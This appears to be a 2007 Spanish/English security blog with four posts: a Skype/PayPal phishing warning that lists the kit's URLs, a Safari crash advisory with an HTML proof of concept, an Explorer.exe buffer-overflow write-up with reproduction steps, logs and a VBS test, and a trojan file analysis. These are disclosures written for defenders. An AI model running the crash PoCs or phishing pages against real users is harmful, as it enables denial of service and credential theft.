Skype Phishing and other pay methoth Scam

Sunday, June 17, 2007
################################################
Skype Phishing and other pay methoth Scam
###############################################

Hoy me llego un correo solicitandome que actualizara
La informacion de mi cuenta de skype (sistema que no uso)


Es una nueva forma de hacerse con las contraseñas de los
incautos usuarios;pero esto va un poco mas lejos.

Si por desgracia accedemos a la web malefica:

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/login.html

ademas de perder nuestra cuenta de skype tenemos mucho
mas que perder.pues la pagina malefica, ademas intentara
por medio de engaño hacerse con varias de nuestras
contraseñas o datos importantes de nuestras formas
de pago por internet.

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/c2.php

Nuestra cuenta de PayPal :

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/PayPal%20-%20Log%20In.htm


nuestra cuenta de MoneyBrookers

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/book1.htm

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/bookf.htm

asi como los posibles datos de nuestra targeta visa y/o mastercard.


aseguraos de que las direcciones que visitais son las autenticas
de los sitios de pago, si no,no introducir ningun dato en ellas y
aun siendo lejitimas , deberiais desconfiar igualmente.

################## €nd ###################################

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Safari 3.0.1 (552.12.2) for windows corefoundation.dll DoS

Saturday, June 16, 2007
############################################
Safari 3.0.1 (552.12.2) for windows corefoundation.dll DoS
Vendor Url:www.apple.com/safari/
Advisore:http://lostmon.blogspot.com/2007/06/
safari-301-552122-for-windows.html
Vendor notify:yes exploit available:yes
BID:http:24497
###########################################

Safari contains a flaw that may allow a remote denial of service.
The issue is triggered when specially crafted input is processed
by the web browser. The crashes occur due to issues with the
functions to manage the History and all History,and will result
in loss of availability for the application.I don´t know if this
can execute arbitrary code.



#############
versions:
#############

Safari 3.0.1

###########
solution:
###########

Update to version 3.0.2

##########
timeline:
##########

discovered:14-06.2007
vendor notify:15-06-2007
vendor response:
disclosure:16-06-2007

#####################
details of the crash
#####################

see the screen shoot:

http://www.spymac.com/upload/2007/06/15/iBvYpCnJFW.gif

--

Crash !

AppName: safari.exe AppVer: 3.522.12.2 ModName: corefoundation.dll
ModVer: 1.434.6.0 Offset: 000097cd

#################
Safari Crash Poc
#################
save this file as html document and open it in safari
put some number in the second form and safai crash.

<html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title>
<body>
<p>Safari 3.0.1 beta for windows Crash Poc By Lostmon (Lostmon@Gmail.com )</p>
<p> Put some number in the second form for crash Safari</p>
<form id="historyForm1" method="GET" action="#">
<input type="text" id="currentIndex1" name="currentIndex" value="sss">
<textarea id="historyLocation1" name="historyLocation"></textarea>
<form id="historyForm2" method="GET" action="#">
<input type="text" id="currentIndex2" name="currentIndex">
<textarea id="historyLocation2" name="historyLocation"></textarea>
</form></form></body></html>

#################### €nd #####################

Thnx to estrella to be my ligth
Thnx to all Lostmon´s Groups
Thnx to all Who belive in me !!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Buffer overflow in extended file atributes in Explorer.exe

Monday, June 04, 2007
#######################################################
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
Buffer overflow in extended file atributes.
Vendor url: http://www.microsoft.com/
Advisore:http://lostmon.blogspot.com/2007/06/
buffer-overflow-in-extended-file.html
Vendor notify:yes Vendor confirmed:yes Exploit include:NO
#######################################################

################
SUMARY:
################

1- History (how and why)
2-explanation of buffer overflow
3-versions tested
4-solution
5-timeline
6-response from vendor
7-Test
8-related vulns and documentations



####################
1-History:
####################


If we look this m$ advisory the information in section :

http://www.microsoft.com/technet/security/advisory/933052.mspx

--
Mitigating Factors for Microsoft Word Remote Code Execution Vulnerability:

The vulnerability cannot be exploited automatically through e-mail.
For an attack to be successful, a user must open an attachment that
is sent in an e-mail message.
--

this is not all true :)

If the user download the file and put in a folder , wen open the
folder explorer crash...

If you open any program, what use windows API and ole32.dll for
open files,and you go to file/open and go to the folder with the
malformed doc file, explorer call ole32.dll and the program is
crashed and loosing all information not save.

Examples of this case :

notepad++ => http://notepad-plus.sourceforge.net/es/site.htm
(vendor notify on 27-05-2007 via Email (no response)

Multiple Macromedia family programs => http://www.macromedia.com
(Adobe vendor informed on 27-05-2007 via webform and Confirmed.
http://www.adobe.com/misc/securityform.html)

multiple others programs are afected.

Affter a simple study on the malformed word document exploit /vulns
i have a little observation and i think that this vuln could be done
in some other programs,not only in a word appz.

Affter monitoring explorer and some dlls i think what this is only
the first point of the iceberg.The overflow is done wen explorer
call the kernel module KERNEL32, wen make some system calls to
manage the information of any file whith ntdll.dll

In the function GetFileAttributesExW and GetFileAttributesW
(KERNEL32) and in the undocumented functions NtQueryInformationFile,
NtQueryDirectoryFile and NtSetInformationFile functions on ntdll.dll

Those functions obtain the extended file atributes if the information
is to long in subfunctions FileAllInformation() in FileNameInformation()
and other (look in file_information_class) we obtain a buffer overflow,
some others subfunctions can get the same error.

Windows show the extended file attributes in multiple parts of the system,
wen look a foñder, wen put the mouse over a file or a folder.

Other applications use the same files for do the same :)

#######################
2-Explanation
#######################

Extended file attributes is a file system feature that enables users to
associate computer files with metadata not interpreted by the filesystem,
whereas regular attributes have a purpose strictly defined by the filesystem
(such as permissions or records of creation and modification times). Unlike
forks, which can usually be as large as the maximum file size, extended
attributes are usually limited in size to a value significantly smaller than
the maximum file size. Typical uses can be storing the author of a document,
the character encoding of a plain-text document,or a checksum.




A local buffer overflow exists in the windows explorer .
The extended file atributes functions have a small size of the buffer in 'FileAllInformation(),FileNameInformation' and other subfunctions in
Undocumented functions of NTDLL , resulting in a buffer overflow. With
a unknow impact.



This is the size of buffer in this related functions
and the main function involved

FileAllInformation
// 18 FILE_ALL_INFORMATION 0x68 NtQueryInformationFile

FileNameInformation
// 9 FILE_NAME_INFORMATION 0x08 NtQueryInformationFile

other functions can be vulnerables too
look this table:

http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/File/FILE_INFORMATION_CLASS.html


wen we put the hand over a file explorer.exe call the extended
file attributes and show this information in a 'bubble' or wen
open a folder explorer look for obtain directory listing, name
files and other information about the files.

how to locate the overflow ?

1-create a new txt file for example explorer.txt
2-rigth click on the file and try propierties
3-in all of the boxes (author ,tittle ,subject,and in special
in comment text area) write multiples A for example or moore:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


4-use filemon http://www.microsoft.com/technet/
sysinternals/FileAndDisk/Filemon.mspx

and include process explorer.exe

5-click on the txt propierties and click on accept or on aply .

6-go to filemon and look the log for explorer.exe you have some
similar to this :


21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE
NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE
NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Options:
Create Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Position:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA FILE
NOT FOUND Options: Open Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileAllInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Options:
OverwriteIf Access: All
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA BUFFER
OVERFLOW FileFsAttributeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
0
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:
88
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
88
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:
88
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER
OVERFLOW FileAllInformation
21:24:00.046 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:
30996
21:24:00.046 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation

the overflow is done :)

affter you can put the hand over the file and explorer show the extended file atributes
and some times filemon mark again the overflow


###################
3-versions tested
###################

i only test with :

Microsof windows XP Home edition all fixes 17/05/2007
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

###################
4-Solution
###################

Wait for a update or patch

####################
5-Timeline:
####################

Discovered:12-03-2007
Vendor notify:19-03-2007
Vendor response:22-03-2007
Private disclosure:17-05-2007
Public disclosure:04-06-2007

######################
6-Response from vendor
######################

Thank you for checking up on this case, We have concluded
our investigations on this matter and have found this crash
to be un-exploitable. This vulnerability is very similar to
another milworm posting (http://www.milw0rm.com/exploits/3419.
As we have not been able to find an exploitable angle for
this issue this crash will get tracking into the next available
Service Pack fix.

#####################
7- Test
#####################

1 download this exploit:
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar
put uncompress it in c:\test or edit in EFA_test.vbs the correct
path were you put the malformed doc file.

2 copy EFA_test.vbs and edit the correct path to file.

3 execute EFA_test.vbs

the file look for the exteded file attributes
of the malformed doc file and wen try to read
the attribute "author" windows Scripting host
Is crashing.

Other overflows could be done in all boxes of
the file propperties.
The applications is crashing because we for look
the malformed doc file use a vbs script.
if any other aplication try to look the malformed
doc file crash too.

this is a simple test using a existing exploit for
microsoft ole32dll.dll , but the overflow is moore deep
is in ntdll.dll because ntdll.dll is the library what use
NtQueryInformationFile for obtain the extended file attributes.

is for that that this overflow it is posible to be
done in all file type with a malformed extended file attributes.



########################################
8-related vulns and documentations
########################################

########################
EFA_test.vbs
########################

Dim arrHeaders(35)
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("C:\test")
For i = 0 to 34
arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)
Next
For Each strFileName in objFolder.Items
For i = 0 to 34
Wscript.Echo i & vbtab & arrHeaders(i) _
& ": " & objFolder.GetDetailsOf(strFileName, i)
Next
Next



###################
RELATED VULNS :
###################

http://secunia.com/advisories/10020/

http://secunia.com/advisories/10194/

http://osvdb.org/displayvuln.php?osvdb_id=31885

http://osvdb.org/displayvuln.php?osvdb_id=31886

http://osvdb.org/displayvuln.php?osvdb_id=31887

###################
Related Exploit
###################

http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar

#################
Related Microsoft
security bulletin
#################

http://www.microsoft.com/technet/security/advisory/933052.mspx

##################
RElated functions
##################

extended file attributes
http://en.wikipedia.org/wiki/Extended_file_attributes

GetExtFileProperties()
http://www.kixtart.org/forums/ubbthreads.php?ubb=showflat&Number=160880&page=1

File information class:
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/
NT%20Objects/File/FILE_INFORMATION_CLASS.html

posible source code of ntdll
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.c
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.h
http://source.winehq.org/source/dlls/ntdll/file.c
the links of ntdll.c and ntdll.h aparently are dead you can try
to search it in google´s cache, sorry for the inconvenience

###############################€nd#########################

thnx To estrella to be my ligth
Thnx To FalconDeOro Hi is investigate and documented with me this issue.
Thnx to Icaro and Badchecksum Team for interesting in research.
Thnx To Jkouns and Jericho for his patience.
Thnx to All osvdb Maglers they are involved in a very nice project.
Thnx to Secunia Research Team They make a Very Good Co-Work with the researchers
They put in my hands all what i need in this and others researchs.
Thnx to All Lostmon´s Group Team
Thnx to Microsoft for the responses.

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Troyano que simula ser actualizacion java

Saturday, June 02, 2007
En los ultimos dias se viene distribuyendo por correo electronico
un correo en el cual se nos informa de un fallo de seguridad en java


Desde ese mismo correo se nos insta a descargar la actualizacion que
solucionara el problema de seguridad.

Al ir al sitio de descarga ,que aparentemente es parecido al sitio
de descarga de Sum microsystems , se nos descarga un arcchivo llamado
install_javav6up2.exe el cual contiene un troyano.


Si obtenemos un pequeño informe del archivo vemos que se ha falseado
hasta la informacion de version del archivo para aparentar se de Sun
el mensaje incorpora varias url que provienen de un server el cual
seguramente ya este comprometido.

http://201.22.57.XX/JAVA/_software/update/index.php?request=Update&program=java
http://201.22.57.XX/JAVA/_software/update/index.php?USUARIO=5B3U6H843N45E82
http://201.22.57.XX/JAVA/_software/download/get.php?license=5B3U6H843N45E82&mode=manual

##################
Analisis del archivo
####################


********************************************************************
FileAlyzer © 2003-2005 Patrick M. Kolla. All Rights Reserved.
********************************************************************


File: C:\Documents and Settings\Lostmon\Escritorio\install_javav6up2.exe
Date: 02/06/2007 2:04:08


***** General ******************************************************
Ubicación: C:\Documents and Settings\Lostmon\Escritorio\
Tamaño: 192512
Versión: 1.2.5.2
CRC-32: 93EEBEE2
MD5: 70CACC3D64585343F6AA04C3135BA24B
SHA1: 20E9C0990D76AB1E8CF84C9425B3F64365E94926
Sólo lectura: No
Oculto: No
Archivo del sistema: No
Carpeta de archivos: No
Archivo: Yes
Enlace simbólico: No
Time stamp: sábado, 02 de junio de 2007 11:31:36
Creado: sábado, 02 de junio de 2007 11:31:34
Último acceso: sábado, 02 de junio de 2007 2:01:16
Modificado: sábado, 02 de junio de 2007 11:31:36


***** Versión ******************************************************
Idiomas soportados:: Portugués (Brasil) (1046/1252)
--- Versión --------------------------------------------------------
Versión del archivo: 1.2.5.2
Empresa: Java
Nombre interno:
Comentarios:
Copyright:
Marcas registradas:
Nombre original: instal_plugin98MEXP.exe
Nombre del producto:
Versión del producto: 2.0.0.0
Descripción: Sun Microsystems Corporation - Arquivo de atualização
Versión privada:
Versión especial:


***** Recursos *****************************************************
--- Cursor ---------------------------------------------------------
1
2
3
4
5
6
7
--- Bitmap ---------------------------------------------------------
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
BBNO
BBOK
BBRETRY
BBYES
PREVIEWGLYPH
--- Icon -----------------------------------------------------------
1
2
--- Dialog ---------------------------------------------------------
DLGTEMPLATE
--- String Table ---------------------------------------------------
4081
4082
4083
4084
4085
4086
4087
4088
4089
4090
4091
4092
4093
4094
4095
4096
--- RCData ---------------------------------------------------------
DVCLAL
PACKAGEINFO
TXTREM
--- Cursor Group ---------------------------------------------------
32761
32762
32763
32764
32765
32766
32767
--- Icon Group -----------------------------------------------------
MAINICON
--- Version Info ---------------------------------------------------
1


***** Cabecera PE **************************************************
Signature: 00004550
Machine: 014C - Intel 386
Number of sections: 0008
Time/Date stamp: 2A425E19
Pointer to symbol table: 00000000
Number of symbols: 00000000
Size of optional header: 00E0
Characteristics: 818E
Magic: 010B
Linker version (major): 02
Linker version (minor): 19
Size of code: 00000000
Size of initialized data: 0000E800
Size of uninitialized data: 00000000
Address of entry point: 00064BD6
Base of code: 00001000
Base of data: 00050000
Image base: 00400000
Section alignment: 00001000
File alignment: 00000200
OS version (major): 0004
OS version (minor): 0000
Image version (major): 0000
Image version (minor): 0000
Sub system version (major): 0004
Sub system version (minor): 0000
Win32 version: 00000000
Size of image: 00066000
Size of headers: 00000400
Checksum: 000308BA
Sub system: 0002 - Windows graphical user interface (GUI) subsystem
DLL characteristics: 0000
Size of stack reserve: 00100000
Size of stack commit: 00004000
Size of heap reserve: 00100000
Size of heap commit: 00001000
Loader flags: 00000000
Number of RVA: 00000010


***** Secciones PE *************************************************
CRC-32: 7059EB4D
MD5: 83C09E84F35E245A0ADA5CC66D4C9B3B
----- Secciones PE -------------------------------------------------
Sección TamañoVirt. DirecciónVirt. TamañoFís. TamañoFís. Parámetros
0004F000 00001000 00028600 00000400 C0000040
00002000 00050000 00000A00 00028A00 C0000040
00001000 00052000 00000000 00029400 C0000040
00002000 00053000 00000E00 00029400 C0000040
00001000 00055000 00000000 0002A200 C0000040
00007000 00056000 00000200 0002A200 C0000040
.rsrc 00006000 0005D000 00002400 0002A400 C0000040
00003000 00063000 00002800 0002C800 C0000040


***** Importar/Exportar tabla **************************************
--- Export table ---------------------------------------------------
--- Import table (libraries: 2) ------------------------------------
kernel32.dll (imports: 1)
GetModuleHandleA
user32.dll (imports: 1)
MessageBoxA

################## €nd #############

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...